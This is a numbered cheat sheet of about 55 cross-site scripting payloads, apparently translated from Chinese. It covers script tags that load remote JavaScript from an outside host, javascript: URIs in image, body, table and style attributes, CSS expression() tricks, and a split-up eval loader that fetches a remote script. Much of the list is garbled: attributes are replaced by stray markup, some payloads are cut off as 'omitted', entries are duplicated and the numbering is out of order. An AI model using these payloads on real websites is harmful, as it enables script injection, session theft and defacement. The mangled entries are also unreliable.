(1) Ordinary XSS: JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up alerts
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab, splitting up "javascript"
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up "javascript"
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line injected JavaScript, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically useless on domestic (Chinese) sites, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters in the IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>